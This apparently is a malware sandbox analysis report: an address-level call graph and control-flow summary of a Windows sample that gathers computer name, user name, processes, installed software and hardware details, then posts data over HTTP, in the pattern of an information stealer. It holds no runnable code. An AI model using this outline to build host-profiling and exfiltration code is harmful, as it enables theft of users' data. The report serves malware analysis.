81147->81148 81149 40595e InternetOpenA StrCmpCA 81148->81149 81150 40597f 81149->81150 81151 406073 InternetCloseHandle 81150->81151 81152 412d64 3 API calls 81150->81152 81153 40608f 81151->81153 81154 40599e 81152->81154 82089 407dc2 CryptStringToBinaryA 81153->82089 81155 4117e0 3 API calls 81154->81155 81157 4059b0 81155->81157 81159 41177a lstrcpyA 81157->81159 81165 4059b9 81159->81165 81160 411715 2 API calls 81161 4060ac 81160->81161 81162 41185b 4 API calls 81161->81162 81164 4060c1 81162->81164 81163 4060cd ctype 81167 4116b4 lstrcpyA 81163->81167 81166 41177a lstrcpyA 81164->81166 81168 41185b 4 API calls 81165->81168 81166->81163 81176 4060fd 81167->81176 81169 4059e3 81168->81169 81170 41177a lstrcpyA 81169->81170 81171 4059ec 81170->81171 81172 41185b 4 API calls 81171->81172 81173 405a0b 81172->81173 81174 41177a lstrcpyA 81173->81174 81175 405a14 81174->81175 81177 4117e0 3 API calls 81175->81177 81176->79946 81178 405a32 81177->81178 81179 41177a lstrcpyA 81178->81179 81180 405a3b 81179->81180 81181 41185b 4 API calls 81180->81181 81182 405a5a 81181->81182 81183 41177a lstrcpyA 81182->81183 81184 405a63 81183->81184 81185 41185b 4 API calls 81184->81185 81186 405a82 81185->81186 81187 41177a lstrcpyA 81186->81187 81188 405a8b 81187->81188 81189 41185b 4 API calls 81188->81189 81190 405ab6 81189->81190 81191 4117e0 3 API calls 81190->81191 81192 405abd 81191->81192 81193 41177a lstrcpyA 81192->81193 81194 405ac6 81193->81194 81195 405adc InternetConnectA 81194->81195 81195->81151 81196 405b08 HttpOpenRequestA 81195->81196 81198 406067 InternetCloseHandle 81196->81198 81199 405b5f 81196->81199 81198->81151 81200 405b65 InternetSetOptionA 81199->81200 81201 405b8a 81199->81201 81200->81201 81202 41185b 4 API calls 81201->81202 81203 405b9e 81202->81203 81204 41177a lstrcpyA 81203->81204 81205 405ba7 81204->81205 81206 4117e0 3 API calls 81205->81206 81207 405bc5 81206->81207 81208 41177a lstrcpyA 81207->81208 81209 405bce 81208->81209 81210 41185b 4 API calls 81209->81210 81211 405bed 81210->81211 81212 41177a lstrcpyA 81211->81212 81213 405bf6 81212->81213 81214 41185b 4 API calls 81213->81214 81215 405c16 81214->81215 81216 41177a lstrcpyA 81215->81216 81217 405c1f 81216->81217 81218 41185b 4 API calls 81217->81218 81219 405c3f 81218->81219 81220 41177a lstrcpyA 81219->81220 81221 405c48 81220->81221 81222 41185b 4 API calls 81221->81222 81223 405c67 81222->81223 81224 41177a lstrcpyA 81223->81224 81225 405c70 81224->81225 81226 4117e0 3 API calls 81225->81226 81227 405c8e 81226->81227 81228 41177a lstrcpyA 81227->81228 81229 405c97 81228->81229 81230 41185b 4 API calls 81229->81230 81231 405cb6 81230->81231 81232 41177a lstrcpyA 81231->81232 81233 405cbf 81232->81233 81234 41185b 4 API calls 81233->81234 81235 405cde 81234->81235 81236 41177a lstrcpyA 81235->81236 81237 405ce7 81236->81237 81238 4117e0 3 API calls 81237->81238 81239 405d05 81238->81239 81240 41177a lstrcpyA 81239->81240 81241 405d0e 81240->81241 81242 41185b 4 API calls 81241->81242 81243 405d2d 81242->81243 81244 41177a lstrcpyA 81243->81244 81245 405d36 81244->81245 81246 41185b 4 API calls 81245->81246 81247 405d56 81246->81247 81248 41177a lstrcpyA 81247->81248 81249 405d5f 81248->81249 81250 41185b 4 API calls 81249->81250 81251 405d7e 81250->81251 81252 41177a lstrcpyA 81251->81252 81253 405d87 81252->81253 81254 41185b 4 API calls 81253->81254 81255 405da6 81254->81255 81256 41177a lstrcpyA 81255->81256 81257 405daf 81256->81257 81258 41185b 4 API calls 81257->81258 81259 405dcf 81258->81259 81260 41177a lstrcpyA 81259->81260 81261 405dd8 81260->81261 81262 41185b 4 API calls 81261->81262 81263 405df7 81262->81263 81264 41177a lstrcpyA 81263->81264 81265 405e00 81264->81265 81266 41185b 4 API calls 81265->81266 81267 405e1f 81266->81267 81268 41177a lstrcpyA 81267->81268 81269 405e28 81268->81269 81270 4117e0 3 API calls 81269->81270 81271 405e46 81270->81271 81272 41177a lstrcpyA 81271->81272 81273 405e4f 81272->81273 81274 41185b 4 API calls 81273->81274 81275 405e6e 81274->81275 81276 41177a lstrcpyA 81275->81276 81277 405e77 81276->81277 81278 41185b 4 API calls 81277->81278 81279 405e97 81278->81279 81280 41177a lstrcpyA 81279->81280 81281 405ea0 81280->81281 81282 41185b 4 API calls 81281->81282 81283 405ebf 81282->81283 81284 41177a lstrcpyA 81283->81284 81285 405ec8 81284->81285 81286 41185b 4 API calls 81285->81286 81287 405ee7 81286->81287 81288 41177a lstrcpyA 81287->81288 81289 405ef0 81288->81289 81290 4117e0 3 API calls 81289->81290 81291 405f0e 81290->81291 81292 41177a lstrcpyA 81291->81292 81293 405f17 81292->81293 81294 405f2a lstrlenA 81293->81294 82083 41193a 81294->82083 81296 405f3b lstrlenA GetProcessHeap HeapAlloc 82084 41193a 81296->82084 81298 405f67 lstrlenA 82085 41193a 81298->82085 81300 405f77 memcpy 82086 41193a 81300->82086 81302 405f8e lstrlenA 81303 405f9e 81302->81303 81304 405fa7 lstrlenA memcpy 81303->81304 82087 41193a 81304->82087 81306 405fce lstrlenA 82088 41193a 81306->82088 81308 405fde HttpSendRequestA 81309 405fe8 InternetReadFile 81308->81309 81310 40601c InternetCloseHandle 81309->81310 81314 406013 81309->81314 81310->81198 81312 41185b 4 API calls 81312->81314 81313 41177a lstrcpyA 81313->81314 81314->81309 81314->81310 81314->81312 81314->81313 82094 41193a 81315->82094 81317 4148c7 strtok_s 81320 4148d3 81317->81320 81318 414971 81318->79949 81319 411715 lstrlenA lstrcpyA 81319->81320 81320->81318 81320->81319 81321 414950 strtok_s 81320->81321 81321->81320 82095 41193a 81322->82095 81324 414600 strtok_s 81327 41460c 81324->81327 81325 41479a 81325->79961 81326 414669 StrCmpCA 81326->81327 81327->81325 81327->81326 81328 411715 lstrlenA lstrcpyA 81327->81328 81329 4146c1 StrCmpCA 81327->81329 81330 414779 strtok_s 81327->81330 81331 4146fa StrCmpCA 81327->81331 81332 414733 StrCmpCA 81327->81332 81328->81327 81329->81327 81330->81327 81331->81327 81332->81327 82096 41193a 81333->82096 81335 4147cb strtok_s 81338 4147d7 81335->81338 81336 414896 81336->79976 81337 414811 StrCmpCA 81337->81338 81338->81336 81338->81337 81339 411715 lstrlenA lstrcpyA 81338->81339 81340 414875 strtok_s 81338->81340 81339->81338 81340->81338 81342 411668 lstrcpyA 81341->81342 81343 4151fa 81342->81343 81344 41185b 4 API calls 81343->81344 81345 41520b 81344->81345 81346 41177a lstrcpyA 81345->81346 81347 415214 81346->81347 81348 41185b 4 API calls 81347->81348 81349 41522e 81348->81349 81350 41177a lstrcpyA 81349->81350 81351 415237 81350->81351 81352 41185b 4 API calls 81351->81352 81353 415250 81352->81353 81354 41177a lstrcpyA 81353->81354 81355 415259 81354->81355 81356 41185b 4 API calls 81355->81356 81357 415272 81356->81357 81358 41177a lstrcpyA 81357->81358 81359 41527b 81358->81359 81360 41185b 4 API calls 81359->81360 81361 415294 81360->81361 81362 41177a lstrcpyA 81361->81362 81363 41529d 81362->81363 82097 411c63 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 81363->82097 81365 4152aa 81366 41185b 4 API calls 81365->81366 81367 4152b7 81366->81367 81368 41177a lstrcpyA 81367->81368 81369 4152c0 81368->81369 81370 41185b 4 API calls 81369->81370 81371 4152d9 81370->81371 81372 41177a lstrcpyA 81371->81372 81373 4152e2 81372->81373 81374 41185b 4 API calls 81373->81374 81375 4152fb 81374->81375 81376 41177a lstrcpyA 81375->81376 81377 415304 81376->81377 82098 4125ca memset RegOpenKeyExA 81377->82098 81379 415311 81380 41185b 4 API calls 81379->81380 81381 41531e 81380->81381 81382 41177a lstrcpyA 81381->81382 81383 415327 81382->81383 81384 41185b 4 API calls 81383->81384 81385 415343 81384->81385 81386 41177a lstrcpyA 81385->81386 81387 41534c 81386->81387 81388 41185b 4 API calls 81387->81388 81389 41536b 81388->81389 81390 41177a lstrcpyA 81389->81390 81391 415374 81390->81391 81392 412667 2 API calls 81391->81392 81393 41538b 81392->81393 81394 4117e0 3 API calls 81393->81394 81395 41539c 81394->81395 81396 41177a lstrcpyA 81395->81396 81397 4153a5 81396->81397 81398 41185b 4 API calls 81397->81398 81399 4153cf 81398->81399 81400 41177a lstrcpyA 81399->81400 81401 4153d8 81400->81401 81402 41185b 4 API calls 81401->81402 81403 4153f7 81402->81403 81404 41177a lstrcpyA 81403->81404 81405 415400 81404->81405 81406 411948 12 API calls 81405->81406 81407 415417 81406->81407 81408 4117e0 3 API calls 81407->81408 81409 415428 81408->81409 81410 41177a lstrcpyA 81409->81410 81411 415431 81410->81411 81412 41185b 4 API calls 81411->81412 81413 41545b 81412->81413 81414 41177a lstrcpyA 81413->81414 81415 415464 81414->81415 81416 41185b 4 API calls 81415->81416 81417 415483 81416->81417 81418 41177a lstrcpyA 81417->81418 81419 41548c 81418->81419 81420 415497 GetCurrentProcessId 81419->81420 82102 413563 OpenProcess 81420->82102 81423 4117e0 3 API calls 81424 4154bc 81423->81424 81425 41177a lstrcpyA 81424->81425 81426 4154c5 81425->81426 81427 41185b 4 API calls 81426->81427 81428 4154ef 81427->81428 81429 41177a lstrcpyA 81428->81429 81430 4154f8 81429->81430 81431 41185b 4 API calls 81430->81431 81432 415517 81431->81432 81433 41177a lstrcpyA 81432->81433 81434 415520 81433->81434 81435 41185b 4 API calls 81434->81435 81436 41553f 81435->81436 81437 41177a lstrcpyA 81436->81437 81438 415548 81437->81438 81439 41185b 4 API calls 81438->81439 81440 415567 81439->81440 81441 41177a lstrcpyA 81440->81441 81442 415570 81441->81442 82107 411add GetProcessHeap HeapAlloc 81442->82107 81445 41185b 4 API calls 81446 415590 81445->81446 81447 41177a lstrcpyA 81446->81447 81448 415599 81447->81448 81449 41185b 4 API calls 81448->81449 81450 4155b8 81449->81450 81451 41177a lstrcpyA 81450->81451 81452 4155c1 81451->81452 81453 41185b 4 API calls 81452->81453 81454 4155e0 81453->81454 81455 41177a lstrcpyA 81454->81455 81456 4155e9 81455->81456 82113 4127af CoInitializeEx CoInitializeSecurity CoCreateInstance 81456->82113 81459 4117e0 3 API calls 81460 415611 81459->81460 81461 41177a lstrcpyA 81460->81461 81462 41561a 81461->81462 81463 41185b 4 API calls 81462->81463 81464 415644 81463->81464 81465 41177a lstrcpyA 81464->81465 81466 41564d 81465->81466 81467 41185b 4 API calls 81466->81467 81468 41566c 81467->81468 81469 41177a lstrcpyA 81468->81469 81470 415675 81469->81470 82131 4129bf CoInitializeEx CoInitializeSecurity CoCreateInstance 81470->82131 81473 4117e0 3 API calls 81474 41569d 81473->81474 81475 41177a lstrcpyA 81474->81475 81476 4156a6 81475->81476 81477 41185b 4 API calls 81476->81477 81478 4156d0 81477->81478 81479 41177a lstrcpyA 81478->81479 81480 4156d9 81479->81480 81481 41185b 4 API calls 81480->81481 81482 4156f8 81481->81482 81483 41177a lstrcpyA 81482->81483 81484 415701 81483->81484 82149 411c21 GetProcessHeap HeapAlloc GetComputerNameA 81484->82149 81487 41185b 4 API calls 81488 415721 81487->81488 81489 41177a lstrcpyA 81488->81489 81490 41572a 81489->81490 81491 41185b 4 API calls 81490->81491 81492 415749 81491->81492 81493 41177a lstrcpyA 81492->81493 81494 415752 81493->81494 81495 41185b 4 API calls 81494->81495 81496 415771 81495->81496 81497 41177a lstrcpyA 81496->81497 81498 41577a 81497->81498 82151 411bec GetProcessHeap HeapAlloc GetUserNameA 81498->82151 81500 41578a 81501 41185b 4 API calls 81500->81501 81502 41579a 81501->81502 81503 41177a lstrcpyA 81502->81503 81504 4157a3 81503->81504 81505 41185b 4 API calls 81504->81505 81506 4157c2 81505->81506 81507 41177a lstrcpyA 81506->81507 81508 4157cb 81507->81508 81509 41185b 4 API calls 81508->81509 81510 4157ea 81509->81510 81511 41177a lstrcpyA 81510->81511 81512 4157f3 81511->81512 82152 41254a 7 API calls 81512->82152 81515 4117e0 3 API calls 81516 41581b 81515->81516 81517 41177a lstrcpyA 81516->81517 81518 415824 81517->81518 81519 41185b 4 API calls 81518->81519 81520 41584e 81519->81520 81521 41177a lstrcpyA 81520->81521 81522 415857 81521->81522 81523 41185b 4 API calls 81522->81523 81524 415876 81523->81524 81525 41177a lstrcpyA 81524->81525 81526 41587f 81525->81526 82155 411d31 81526->82155 81528 415896 81529 4117e0 3 API calls 81528->81529 81530 4158a7 81529->81530 81531 41177a lstrcpyA 81530->81531 81532 4158b0 81531->81532 81533 41185b 4 API calls 81532->81533 81534 4158da 81533->81534 81535 41177a lstrcpyA 81534->81535 81536 4158e3 81535->81536 81537 41185b 4 API calls 81536->81537 81538 415902 81537->81538 81539 41177a lstrcpyA 81538->81539 81540 41590b 81539->81540 82167 411c63 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 81540->82167 81542 41591b 81543 41185b 4 API calls 81542->81543 81544 41592b 81543->81544 81545 41177a lstrcpyA 81544->81545 81546 415934 81545->81546 81547 41185b 4 API calls 81546->81547 81548 415953 81547->81548 81549 41177a lstrcpyA 81548->81549 81550 41595c 81549->81550 81551 41185b 4 API calls 81550->81551 81552 41597b 81551->81552 81553 41177a lstrcpyA 81552->81553 81554 415984 81553->81554 82168 411cbf GetProcessHeap HeapAlloc GetTimeZoneInformation 81554->82168 81557 41185b 4 API calls 81558 4159a4 81557->81558 81559 41177a lstrcpyA 81558->81559 81560 4159ad 81559->81560 81561 41185b 4 API calls 81560->81561 81562 4159cc 81561->81562 81563 41177a lstrcpyA 81562->81563 81564 4159d5 81563->81564 81565 41185b 4 API calls 81564->81565 81566 4159f4 81565->81566 81567 41177a lstrcpyA 81566->81567 81568 4159fd 81567->81568 81569 41185b 4 API calls 81568->81569 81570 415a1c 81569->81570 81571 41177a lstrcpyA 81570->81571 81572 415a25 81571->81572 82171 411eb5 GetProcessHeap HeapAlloc RegOpenKeyExA 81572->82171 81575 41185b 4 API calls 81576 415a45 81575->81576 81577 41177a lstrcpyA 81576->81577 81578 415a4e 81577->81578 81579 41185b 4 API calls 81578->81579 81580 415a6d 81579->81580 81581 41177a lstrcpyA 81580->81581 81582 415a76 81581->81582 81583 41185b 4 API calls 81582->81583 81584 415a95 81583->81584 81585 41177a lstrcpyA 81584->81585 81586 415a9e 81585->81586 82174 411f54 81586->82174 81589 41185b 4 API calls 81590 415abe 81589->81590 81591 41177a lstrcpyA 81590->81591 81592 415ac7 81591->81592 81593 41185b 4 API calls 81592->81593 81594 415ae6 81593->81594 81595 41177a lstrcpyA 81594->81595 81596 415aef 81595->81596 81597 41185b 4 API calls 81596->81597 81598 415b0e 81597->81598 81599 41177a lstrcpyA 81598->81599 81600 415b17 81599->81600 82189 411f21 GetSystemInfo wsprintfA 81600->82189 81602 415b27 81603 41185b 4 API calls 81602->81603 81604 415b37 81603->81604 81605 41177a lstrcpyA 81604->81605 81606 415b40 81605->81606 81607 41185b 4 API calls 81606->81607 81608 415b5f 81607->81608 81609 41177a lstrcpyA 81608->81609 81610 415b68 81609->81610 81611 41185b 4 API calls 81610->81611 81612 415b87 81611->81612 81613 41177a lstrcpyA 81612->81613 81614 415b90 81613->81614 82190 412081 GetProcessHeap HeapAlloc 81614->82190 81616 415ba0 81617 41185b 4 API calls 81616->81617 81618 415bb0 81617->81618 81619 41177a lstrcpyA 81618->81619 81620 415bb9 81619->81620 81621 41185b 4 API calls 81620->81621 81622 415bd8 81621->81622 81623 41177a lstrcpyA 81622->81623 81624 415be1 81623->81624 81625 41185b 4 API calls 81624->81625 81626 415c00 81625->81626 81627 41177a lstrcpyA 81626->81627 81628 415c09 81627->81628 82195 41210d 81628->82195 81630 415c20 81631 4117e0 3 API calls 81630->81631 81632 415c31 81631->81632 81633 41177a lstrcpyA 81632->81633 81634 415c3a 81633->81634 81635 41185b 4 API calls 81634->81635 81636 415c64 81635->81636 81637 41177a lstrcpyA 81636->81637 81638 415c6d 81637->81638 81639 41185b 4 API calls 81638->81639 81640 415c8c 81639->81640 81641 41177a lstrcpyA 81640->81641 81642 415c95 81641->81642 82203 41246a 81642->82203 81644 415cac 81645 4117e0 3 API calls 81644->81645 81646 415cbd 81645->81646 81647 41177a lstrcpyA 81646->81647 81648 415cc6 81647->81648 81649 41185b 4 API calls 81648->81649 81650 415cf0 81649->81650 81651 41177a lstrcpyA 81650->81651 81652 415cf9 81651->81652 81653 41185b 4 API calls 81652->81653 81654 415d18 81653->81654 81655 41177a lstrcpyA 81654->81655 81656 415d21 81655->81656 82213 41218b 81656->82213 81658 415d3d 81659 4117e0 3 API calls 81658->81659 81660 415d4f 81659->81660 81661 41177a lstrcpyA 81660->81661 81662 415d58 81661->81662 81663 41218b 13 API calls 81662->81663 81664 415d7f 81663->81664 81665 4117e0 3 API calls 81664->81665 81666 415d91 81665->81666 81667 41177a lstrcpyA 81666->81667 81668 415d9a 81667->81668 81669 41185b 4 API calls 81668->81669 81670 415dc4 81669->81670 81671 41177a lstrcpyA 81670->81671 81672 415dcd 81671->81672 81673 415de0 lstrlenA 81672->81673 81674 415df0 81673->81674 81675 411668 lstrcpyA 81674->81675 81676 415e00 81675->81676 81677 40134c lstrcpyA 81676->81677 81678 415e0e 81677->81678 82246 418db9 81678->82246 81680 415e1a 81680->79982 81682 4116b4 lstrcpyA 81681->81682 81683 404aee 81682->81683 81684 40430f 5 API calls 81683->81684 81685 404afa GetProcessHeap RtlAllocateHeap 81684->81685 82388 41193a 81685->82388 81687 404b53 InternetOpenA StrCmpCA 81688 404b77 81687->81688 81689 404b88 InternetConnectA 81688->81689 81690 404dad InternetCloseHandle 81688->81690 81691 404da1 InternetCloseHandle 81689->81691 81692 404bba HttpOpenRequestA 81689->81692 81698 404c7e 81690->81698 81691->81690 81694 404c13 81692->81694 81695 404d98 InternetCloseHandle 81692->81695 81696 404c19 InternetSetOptionA 81694->81696 81697 404c3e HttpSendRequestA HttpQueryInfoA 81694->81697 81695->81691 81696->81697 81697->81698 81701 404cbe 81697->81701 81698->79993 81701->81698 82032 412b6b malloc 82023->82032 82025 42150a 82026 42151f 82025->82026 82044 4215b0 malloc lstrlenA lstrcpyA _MSFOpenExW 82025->82044 82033 41fd2c 82026->82033 82031 42154d ctype 82031->80820 82032->82025 82034 41fd3e 82033->82034 82040 41fd6d 82033->82040 82035 41fde0 82034->82035 82036 41fd7d SetFilePointer 82034->82036 82034->82040 82037 41fde6 CreateFileA 82035->82037 82038 41fe48 82035->82038 82039 41fdc2 82036->82039 82037->82039 82038->82040 82041 41fe79 CreateFileMappingA 82038->82041 82039->82040 82040->82031 82045 412b6b malloc 82040->82045 82041->82040 82042 41fea2 MapViewOfFile 82041->82042 82042->82040 82043 41fec9 CloseHandle 82042->82043 82043->82040 82044->82026 82045->82031 82047 411668 lstrcpyA 82046->82047 82048 4022d1 82047->82048 82048->80873 82049->80883 82050->80924 82051->80897 82052->80924 82053->80900 82054->80911 82055->80924 82056->80915 82057->80929 82058->80924 82059->80931 82060->80940 82061->80924 82063 412691 82062->82063 82064 41267e 82062->82064 82066 411668 lstrcpyA 82063->82066 82065 411668 lstrcpyA 82064->82065 82067 41268a 82065->82067 82066->82067 82067->80964 82068->80969 82070 40432d ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 82069->82070 82080 41193a 82070->82080 82073 4043b8 lstrlenA 82081 41193a 82073->82081 82075 4043c8 InternetCrackUrlA 82076 4043e5 82075->82076 82076->80978 82077->81106 82079 411712 82078->82079 82079->81031 82080->82073 82081->82075 82082->81116 82083->81296 82084->81298 82085->81300 82086->81302 82087->81306 82088->81308 82090 407df0 LocalAlloc 82089->82090 82091 406095 82089->82091 82090->82091 82092 407e0a CryptStringToBinaryA 82090->82092 82091->81160 82091->81163 82092->82091 82093 407e2c LocalFree 82092->82093 82093->82091 82094->81317 82095->81324 82096->81335 82097->81365 82099 41261c RegQueryValueExA 82098->82099 82100 41263f CharToOemA 82098->82100 82099->82100 82100->81379 82103 4135a5 82102->82103 82104 413585 K32GetModuleFileNameExA CloseHandle 82102->82104 82105 411668 lstrcpyA 82103->82105 82104->82103 82106 4135b4 82105->82106 82106->81423 82265 411bd2 82107->82265 82110 411b13 RegOpenKeyExA 82111 411b33 RegQueryValueExA 82110->82111 82112 411b0a 82110->82112 82111->82112 82112->81445 82114 41283c 82113->82114 82115 412844 CoSetProxyBlanket 82114->82115 82116 41297e 82114->82116 82118 412881 82115->82118 82117 411668 lstrcpyA 82116->82117 82126 412977 82117->82126 82119 41296a 82118->82119 82121 412889 82118->82121 82120 411668 lstrcpyA 82119->82120 82120->82126 82122 4128bd VariantInit 82121->82122 82123 4128b8 82121->82123 82125 4128e1 82122->82125 82124 411668 lstrcpyA 82123->82124 82124->82126 82271 4126a3 82125->82271 82126->81459 82128 4128ef FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 82129 411668 lstrcpyA 82128->82129 82130 412951 VariantClear 82129->82130 82130->82126 82132 412a4c 82131->82132 82133 412b22 82132->82133 82134 412a54 CoSetProxyBlanket 82132->82134 82135 411668 lstrcpyA 82133->82135 82136 412a91 82134->82136 82140 412b1b 82135->82140 82137 412b0e 82136->82137 82139 412a95 82136->82139 82138 411668 lstrcpyA 82137->82138 82138->82140 82141 412ac2 VariantInit 82139->82141 82142 412ac0 82139->82142 82140->81473 82144 412ae6 82141->82144 82143 411668 lstrcpyA 82142->82143 82143->82140 82280 412ef6 LocalAlloc CharToOemW 82144->82280 82146 412aee 82147 411668 lstrcpyA 82146->82147 82148 412af8 VariantClear 82147->82148 82148->82140 82150 411c55 82149->82150 82150->81487 82151->81500 82153 411668 lstrcpyA 82152->82153 82154 4125c5 82153->82154 82154->81515 82156 411668 lstrcpyA 82155->82156 82157 411d4a GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 82156->82157 82166 411d98 82157->82166 82158 411e87 82160 411e96 82158->82160 82161 411e8d LocalFree 82158->82161 82159 411db7 GetLocaleInfoA 82159->82166 82162 4116b4 lstrcpyA 82160->82162 82161->82160 82163 411ea5 82162->82163 82163->81528 82164 41177a lstrcpyA 82164->82166 82165 41185b lstrcpyA lstrlenA lstrcpyA lstrcatA 82165->82166 82166->82158 82166->82159 82166->82164 82166->82165 82167->81542 82169 411d06 wsprintfA 82168->82169 82170 411cfe 82168->82170 82169->82170 82170->81557 82172 411f13 82171->82172 82173 411ef9 RegQueryValueExA 82171->82173 82172->81575 82173->82172 82175 411f78 GetLogicalProcessorInformationEx 82174->82175 82176 411fe6 82175->82176 82177 411f96 GetLastError 82175->82177 82283 412c28 GetProcessHeap HeapFree 82176->82283 82178 411fa1 82177->82178 82179 411fda 82177->82179 82188 411faa 82178->82188 82184 412079 82179->82184 82284 412c28 GetProcessHeap HeapFree 82179->82284 82184->81589 82185 412035 82185->82179 82187 41203c wsprintfA 82185->82187 82186 411fce 82186->82184 82187->82184 82188->82175 82188->82186 82281 412c28 GetProcessHeap HeapFree 82188->82281 82282 412c45 GetProcessHeap HeapAlloc 82188->82282 82189->81602 82285 412bde 82190->82285 82193 4120f1 wsprintfA 82193->81616 82194 4120c1 __aulldiv 82194->82193 82196 411668 lstrcpyA 82195->82196 82197 412123 82196->82197 82198 412130 EnumDisplayDevicesA 82197->82198 82199 411715 2 API calls 82197->82199 82202 412157 82197->82202 82198->82197 82198->82202 82199->82197 82200 4116b4 lstrcpyA 82201 41217e 82200->82201 82201->81630 82202->82200 82204 411668 lstrcpyA 82203->82204 82205 412483 CreateToolhelp32Snapshot Process32First 82204->82205 82206 412522 CloseHandle 82205->82206 82207 4124ae Process32Next 82205->82207 82208 4116b4 lstrcpyA 82206->82208 82207->82206 82210 4124c2 82207->82210 82209 41253a 82208->82209 82209->81644 82210->82207 82211 41185b lstrcpyA lstrlenA lstrcpyA lstrcatA 82210->82211 82212 41177a lstrcpyA 82210->82212 82211->82210 82212->82210 82214 411668 lstrcpyA 82213->82214 82215 4121a4 RegOpenKeyExA 82214->82215 82216 4121e8 82215->82216 82217 41220a 82215->82217 82218 4116b4 lstrcpyA 82216->82218 82219 41222d RegEnumKeyExA 82217->82219 82245 412423 82217->82245 82220 4121f7 82218->82220 82221 412272 wsprintfA RegOpenKeyExA 82219->82221 82219->82245 82220->81658 82222 4122f0 RegQueryValueExA 82221->82222 82223 4122b6 82221->82223 82224 412328 lstrlenA 82222->82224 82222->82245 82230 4116b4 lstrcpyA 82223->82230 82226 41233e 82224->82226 82224->82245 82225 4116b4 lstrcpyA 82225->82220 82227 41185b 4 API calls 82226->82227 82228 412355 82227->82228 82229 41177a lstrcpyA 82228->82229 82231 412361 82229->82231 82230->82220 82232 41185b 4 API calls 82231->82232 82233 412385 82232->82233 82234 41177a lstrcpyA 82233->82234 82235 412391 82234->82235 82236 41239c RegQueryValueExA 82235->82236 82237 4123d0 82236->82237 82236->82245 82238 41185b 4 API calls 82237->82238 82239 4123e7 82238->82239 82240 41177a lstrcpyA 82239->82240 82241 4123f3 82240->82241 82242 41185b 4 API calls 82241->82242 82243 412417 82242->82243 82244 41177a lstrcpyA 82243->82244 82244->82245 82245->82225 82247 418dc7 82246->82247 82248 41177a lstrcpyA 82247->82248 82249 418df1 82248->82249 82250 41177a lstrcpyA 82249->82250 82251 418e17 82250->82251 82252 41177a lstrcpyA 82251->82252 82253 418e23 82252->82253 82254 41177a lstrcpyA 82253->82254 82255 418e2f 82254->82255 82256 418ead 82255->82256 82258 418ea0 Sleep 82255->82258 82261 418e3d 82255->82261 82257 411668 lstrcpyA 82256->82257 82264 418eba 82257->82264 82260 418eab 82258->82260 82259 418e74 CreateThread WaitForSingleObject 82259->82256 82378 418c65 82259->82378 82260->82255 82261->82259 82287 421744 82261->82287 82264->81680 82268 411b5b GetProcessHeap HeapAlloc RegOpenKeyExA 82265->82268 82267 411b06 82267->82110 82267->82112 82269 411b9f RegQueryValueExA 82268->82269 82270 411bb8 82268->82270 82269->82270 82270->82267 82279 412b63 82271->82279 82273 4126da CoCreateInstance 82274 412780 82273->82274 82275 4126fd SysAllocString 82273->82275 82274->82128 82275->82274 82277 41270f 82275->82277 82276 412777 SysFreeString 82276->82274 82277->82276 82278 41274a _wtoi64 SysFreeString 82277->82278 82278->82276 82279->82273 82280->82146 82281->82188 82282->82188 82283->82185 82284->82184 82286 4120ab GlobalMemoryStatusEx 82285->82286 82286->82194 82290 4216e0 82287->82290 82291 418e71 82290->82291 82292 4216fc 82290->82292 82291->82259 82292->82291 82294 42095b 82292->82294 82296 420981 82294->82296 82351 420977 82294->82351 82295 4209bb lstrcpyA 82297 4209e0 82295->82297 82295->82351 82296->82295 82296->82351 82298 420a33 strlen 82297->82298 82299 420a4d 82297->82299 82298->82299 82300 420a84 82299->82300 82366 41f930 9 API calls 82299->82366 82302 420a96 82300->82302 82303 420aa9 82300->82303 82367 4201a9 15 API calls _MSFOpenExW 82302->82367 82305 420ac5 82303->82305 82306 420aaf 82303->82306 82309 420ae1 82305->82309 82310 420acb 82305->82310 82368 420255 13 API calls _MSFOpenExW 82306->82368 82307 420aa4 82312 420b01 82307->82312 82311 420ae7 82309->82311 82309->82351 82369 4203dd FileTimeToSystemTime GetLocalTime SystemTimeToFileTime _MSFOpenExW 82310->82369 82370 4204e9 FileTimeToSystemTime GetLocalTime SystemTimeToFileTime _MSFOpenExW 82311->82370 82315 420b0f lstrcpyA lstrcpyA lstrlenA 82312->82315 82312->82351 82316 420b76 lstrcpyA 82315->82316 82317 420b57 lstrcatA 82315->82317 82318 420c0d _MSFOpenExW 82316->82318 82317->82316 82319 420e07 memcpy 82318->82319 82320 420e44 _MSFOpenExW 82319->82320 82321 420e56 82320->82321 82322 420e6b 82320->82322 82323 42070a _MSFOpenExW CloseHandle 82321->82323 82324 420e99 82322->82324 82326 420eb2 _MSFOpenExW 82322->82326 82323->82351 82325 42070a _MSFOpenExW CloseHandle 82324->82325 82325->82351 82351->82291 82366->82300 82367->82307 82368->82307 82369->82307 82370->82307 82387 41193a 82378->82387 82380 418c98 lstrlenA 82381 418ca4 82380->82381 82385 418cb6 82380->82385 82382 4116b4 lstrcpyA 82382->82385 82383 404e03 43 API calls 82383->82385 82384 41177a lstrcpyA 82384->82385 82385->82381 82385->82382 82385->82383 82385->82384 82386 418d4a StrCmpCA 82385->82386 82386->82381 82386->82385 82387->82380 82388->81687

                                                    Executed Functions

                                                    Function 0041B050 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 507libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 592 41b050-41b05a 593 41b060-41b4d2 GetProcAddress * 50 592->593 594 41b4d7-41b576 LoadLibraryA * 9 592->594 593->594 595 41b578-41b5e6 GetProcAddress * 5 594->595 596 41b5eb-41b5f2 594->596 595->596 597 41b6b0-41b6b7 596->597 598 41b5f8-41b6ab GetProcAddress * 8 596->598 599 41b6b9-41b727 GetProcAddress * 5 597->599 600 41b72c-41b733 597->600 598->597 599->600 601 41b7c3-41b7ca 600->601 602 41b739-41b7be GetProcAddress * 6 600->602 603 41b7d0-41b89a GetProcAddress * 9 601->603 604 41b89f-41b8a6 601->604 602->601 603->604 605 41b8a8-41b916 GetProcAddress * 5 604->605 606 41b91b-41b922 604->606 605->606 607 41b952-41b959 606->607 608 41b924-41b94d GetProcAddress * 2 606->608 609 41b989-41b990 607->609 610 41b95b-41b984 GetProcAddress * 2 607->610 608->607 611 41b996-41ba75 GetProcAddress * 10 609->611 612 41ba7a-41ba81 609->612 610->609 611->612 613 41ba83-41bada GetProcAddress * 4 612->613 614 41badf-41bae6 612->614 613->614 615 41bae8-41bafa GetProcAddress 614->615 616 41baff-41bb06 614->616 